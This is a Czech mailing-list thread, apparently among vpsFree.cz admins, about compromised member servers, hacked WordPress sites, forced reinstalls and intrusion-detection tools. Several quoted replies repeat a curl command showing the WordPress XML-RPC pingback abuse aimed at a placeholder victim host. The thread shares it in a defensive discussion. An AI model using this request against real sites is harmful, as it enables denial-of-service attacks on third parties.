Otazka je, jak moc prudit cleny kvuli tomuto. Standardni odpoved na to byva neco jako bounty program, ale nevim zatim, jak by to mohlo fungovat u zdruzeni typu vpsfree.
Automatizovat vyhledavani zastaralejch verzi baliku napric kontejnerama stejne nezachrani deravy wordpressy nachazejici se na tech nejnestandardnejsich mistech, prohledavat FS kazdyho kontejneru takhle se neda. Nevim, moc se s tim asi delat neda no.
Wordpress je zlo: "Notorious botnet comes complete with blogging software"
curl -D - "http://awritersnotepad.wordpress.com/xmlrpc.php" -d '<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://victim.com</string></value></param><param><value><string>awritersnotepad.wordpress.com/postchosen</string></value></param></params></methodCall>'
Srandovni reply header: X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Such source: http://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-dis...
Ondro
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
On 03/16/2014 03:54 AM, Ondrej Mikle wrote:
On 03/16/2014 02:34 AM, Pavel Snajdr wrote:
Ale at nad tim premejslim z jakyho chci uhlu, proste nevidim, jak se tomu vyhnout, krome prevence/osvety... Coz ale proste nefunguje, protoze tu svobodu mit svuj server maji i ti, co je to proste nezajima a jenom potrebujou, aby jim ten jejich eshop jel. S takovyma nadelame neco jenom tezko, protoze ti na to jdou stylem "install&forget", coz u systemu vystavenych do internetu nejde, no.
Otazka je, jak moc prudit cleny kvuli tomuto. Standardni odpoved na to byva neco jako bounty program, ale nevim zatim, jak by to mohlo fungovat u zdruzeni typu vpsfree.
No, tak nejak. Asi s tim moc nenadelame. Jediny, co s tim post-mortem muzem delat, je vynutit si reinstall takovy VPS od clena, jinak mu ji nepustime. Toto realne delam ve vetsine pripadu, tzn. opravdu si chcete vsichni drzet ty VPS zabezpeceny, nechcete, abych po vas dupal, ze si to musite reinstallovat :) Drtiva vetsina lidi totiz nema na to dohledat vsechny dopady hacku dany VPS po celym jejim FS, takze je reinstall jedinou rozumnou moznosti. Ale jsou lidi, co by do nej dobrovolne nesli a radsi posilali spamy z VPS, tak proto to vynucuju (yes, i takovi jsou..).
Automatizovat vyhledavani zastaralejch verzi baliku napric kontejnerama stejne nezachrani deravy wordpressy nachazejici se na tech nejnestandardnejsich mistech, prohledavat FS kazdyho kontejneru takhle se neda. Nevim, moc se s tim asi delat neda no.
Wordpress je zlo: "Notorious botnet comes complete with blogging software"
curl -D - "http://awritersnotepad.wordpress.com/xmlrpc.php" -d '<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://victim.com</string></value></param><param><value><string>awritersnotepad.wordpress.com/postchosen</string></value></param></params></methodCall>'
Srandovni reply header: X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Such source: http://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-dis...
Nj
jenze tohle zlo jedno z nejrozsirenejsich blogovadel/webovadel na svete, takze nas bude trapit jeste pekne dlouho :)
Jinak jeste @ rkhunter: neznam moc alternativ no. Pak jsou akorat softy, ktery delaji neco trochu jinyho, v podstate ale taky IDS (intrusion detection).
Kdysi se zvyknul pouzivat Tripwire, ale posledni release je 2011, takze jeste horsi, nez s rkhunterem.
Ale behem hledani jsem narazil asi na jeden z mala aktivne vyvijenejch IDS pro linux aktualne:
(ono je toho vic, ale vsechno je nevyvijeny, napr AIDE, OSSEC...)
/snajpa
Ondro
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
On 03/16/2014 01:47 PM, Pavel Snajdr wrote:
On 03/16/2014 03:54 AM, Ondrej Mikle wrote:
On 03/16/2014 02:34 AM, Pavel Snajdr wrote:
Ale at nad tim premejslim z jakyho chci uhlu, proste nevidim, jak se tomu vyhnout, krome prevence/osvety... Coz ale proste nefunguje, protoze tu svobodu mit svuj server maji i ti, co je to proste nezajima a jenom potrebujou, aby jim ten jejich eshop jel. S takovyma nadelame neco jenom tezko, protoze ti na to jdou stylem "install&forget", coz u systemu vystavenych do internetu nejde, no.
Otazka je, jak moc prudit cleny kvuli tomuto. Standardni odpoved na to byva neco jako bounty program, ale nevim zatim, jak by to mohlo fungovat u zdruzeni typu vpsfree.
No, tak nejak. Asi s tim moc nenadelame. Jediny, co s tim post-mortem muzem delat, je vynutit si reinstall takovy VPS od clena, jinak mu ji nepustime. Toto realne delam ve vetsine pripadu, tzn. opravdu si chcete vsichni drzet ty VPS zabezpeceny, nechcete, abych po vas dupal, ze si to musite reinstallovat :) Drtiva vetsina lidi totiz nema na to dohledat vsechny dopady hacku dany VPS po celym jejim FS, takze je reinstall jedinou rozumnou moznosti. Ale jsou lidi, co by do nej dobrovolne nesli a radsi posilali spamy z VPS, tak proto to vynucuju (yes, i takovi jsou..).
Automatizovat vyhledavani zastaralejch verzi baliku napric kontejnerama stejne nezachrani deravy wordpressy nachazejici se na tech nejnestandardnejsich mistech, prohledavat FS kazdyho kontejneru takhle se neda. Nevim, moc se s tim asi delat neda no.
Wordpress je zlo: "Notorious botnet comes complete with blogging software"
curl -D - "http://awritersnotepad.wordpress.com/xmlrpc.php" -d '<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://victim.com</string></value></param><param><value><string>awritersnotepad.wordpress.com/postchosen</string></value></param></params></methodCall>'
Srandovni reply header: X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Such source: http://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-dis...
Nj
jenze tohle zlo jedno z nejrozsirenejsich blogovadel/webovadel na svete, takze nas bude trapit jeste pekne dlouho :)
Jinak jeste @ rkhunter: neznam moc alternativ no. Pak jsou akorat softy, ktery delaji neco trochu jinyho, v podstate ale taky IDS (intrusion detection).
Kdysi se zvyknul pouzivat Tripwire, ale posledni release je 2011, takze jeste horsi, nez s rkhunterem.
Ale behem hledani jsem narazil asi na jeden z mala aktivne vyvijenejch IDS pro linux aktualne:
(ono je toho vic, ale vsechno je nevyvijeny, napr AIDE, OSSEC...)
Tak OSSEC je vyvijenej, AIDE taky (to sice pomalu, ale jo), nacucal jsem blby info z wikikpedie, yay! :)
/snajpa
/snajpa
Ondro
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
On 03/16/2014 01:47 PM, Pavel Snajdr wrote:
On 03/16/2014 03:54 AM, Ondrej Mikle wrote:
On 03/16/2014 02:34 AM, Pavel Snajdr wrote:
Ale at nad tim premejslim z jakyho chci uhlu, proste nevidim, jak se tomu vyhnout, krome prevence/osvety... Coz ale proste nefunguje, protoze tu svobodu mit svuj server maji i ti, co je to proste nezajima a jenom potrebujou, aby jim ten jejich eshop jel. S takovyma nadelame neco jenom tezko, protoze ti na to jdou stylem "install&forget", coz u systemu vystavenych do internetu nejde, no.
Otazka je, jak moc prudit cleny kvuli tomuto. Standardni odpoved na to byva neco jako bounty program, ale nevim zatim, jak by to mohlo fungovat u zdruzeni typu vpsfree.
No, tak nejak. Asi s tim moc nenadelame. Jediny, co s tim post-mortem muzem delat, je vynutit si reinstall takovy VPS od clena, jinak mu ji nepustime. Toto realne delam ve vetsine pripadu, tzn. opravdu si chcete vsichni drzet ty VPS zabezpeceny, nechcete, abych po vas dupal, ze si to musite reinstallovat :) Drtiva vetsina lidi totiz nema na to dohledat vsechny dopady hacku dany VPS po celym jejim FS, takze je reinstall jedinou rozumnou moznosti. Ale jsou lidi, co by do nej dobrovolne nesli a radsi posilali spamy z VPS, tak proto to vynucuju (yes, i takovi jsou..).
Jenom upresneni - kdyz ti nekdo hackne wordpress a posila odtamtud spamy, preposilam abuse notices na mail uvedeny ve vpsAdminu. Kdyz se to opakuje nekolikrat v prubehu tak tydne a situace se neresi (tzn. clen se treba ani neozve) nasleduje suspend clena, ale kvuli tomu reinstall po nikom nechci.
Reinstall chci v pripade, ze ve VPS vidim bezet procesy, co si process name zmenily na napr. /usr/sbin/httpd nebo /usr/sbin/sshd, ale jejich /proc/<pid>/exe ukazuje na Perl; pri takovych a podobnych pripadech je to na reinstall, protoze to uz je realny vlamani dovnitr VPS. Vsimnu si jich jednoduse - kterej sshd nebo httpd zere 100% CPU porad? :)
Tak jenom tak, aby v tom bylo jasno vsem :)
/snajpa
Automatizovat vyhledavani zastaralejch verzi baliku napric kontejnerama stejne nezachrani deravy wordpressy nachazejici se na tech nejnestandardnejsich mistech, prohledavat FS kazdyho kontejneru takhle se neda. Nevim, moc se s tim asi delat neda no.
Wordpress je zlo: "Notorious botnet comes complete with blogging software"
curl -D - "http://awritersnotepad.wordpress.com/xmlrpc.php" -d '<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://victim.com</string></value></param><param><value><string>awritersnotepad.wordpress.com/postchosen</string></value></param></params></methodCall>'
Srandovni reply header: X-hacker: If you're reading this, you
should visit automattic.com/jobs and apply to join the fun, mention this header.
Such source: http://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-dis...
Nj
jenze tohle zlo jedno z nejrozsirenejsich blogovadel/webovadel na svete, takze nas bude trapit jeste pekne dlouho :)
Jinak jeste @ rkhunter: neznam moc alternativ no. Pak jsou akorat softy, ktery delaji neco trochu jinyho, v podstate ale taky IDS (intrusion detection).
Kdysi se zvyknul pouzivat Tripwire, ale posledni release je 2011, takze jeste horsi, nez s rkhunterem.
Ale behem hledani jsem narazil asi na jeden z mala aktivne vyvijenejch IDS pro linux aktualne:
(ono je toho vic, ale vsechno je nevyvijeny, napr AIDE, OSSEC...)
/snajpa
Ondro
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
_______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
community-list@lists.vpsfree.cz
-
Michal Krajcirovic -
Ondrej Mikle -
Pavel Snajdr